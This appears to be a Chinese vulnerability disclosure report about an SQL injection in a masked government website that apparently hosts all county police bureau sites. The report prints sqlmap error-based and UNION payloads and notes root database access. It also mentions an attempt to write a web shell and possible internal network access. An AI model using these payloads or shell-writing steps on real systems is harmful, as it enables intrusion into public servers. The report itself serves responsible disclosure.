2015-03-06: 细节已通知厂商并且等待厂商处理中 2015-03-11: 厂商已经确认,细节仅向厂商公开 2015-03-21: 细节向核心白帽子及相关领域专家公开 2015-03-31: 细节向普通白帽子公开 2015-04-10: 细节向实习白帽子公开 2015-04-20: 细节向公众公开
仅作测试,没有妄动!
随便看看,然后想看看有没有注入发现
1.http://**.**.**/tabled.phpbh=1&lx=wsxf&pass=1
存在注入
---Place: GETParameter: pass Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: bh=1&lx=wsxf&pass=1' AND (SELECT 1343 FROM(SELECT COUNT(*),CONCAT(0x7177707871,(SELECT (CASE WHEN (1343=1343) THEN 1 ELSE 0 END)),0x7163797a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KLbn'='KLbn Type: UNION query Title: MySQL UNION query (NULL) - 18 columns Payload: bh=1&lx=wsxf&pass=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7177707871,0x41556d48757464686d6e,0x7163797a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---web application technology: Apache 2.4.3, PHP 5.4.7back-end DBMS: MySQL 5.0
然后发现用户是root
Place: GETParameter: pass Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: bh=1&lx=wsxf&pass=1' AND (SELECT 1343 FROM(SELECT COUNT(*),CONCAT(0x7177707871,(SELECT (CASE WHEN (1343=1343) THEN 1 ELSE 0 END)),0x7163797a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KLbn'='KLbn Type: UNION query Title: MySQL UNION query (NULL) - 18 columns Payload: bh=1&lx=wsxf&pass=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7177707871,0x41556d48757464686d6e,0x7163797a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---web application technology: Apache 2.4.3, PHP 5.4.7back-end DBMS: MySQL 5.0current user: 'root@localhost'
打开此链接
1.http://**.**.**/tabled.phpbh=1
发现web路径
尝试写shell
然后貌似可以内网
紧接着发现所有区县公安局网站全在这个服务器上
对应目录
求不跨省
危害等级:高
漏洞Rank:15
确认时间:2015-03-11 10:26
已确认存在所描述情况。
暂无
已交由第三方厂商(公安部某技术支撑单位)处理
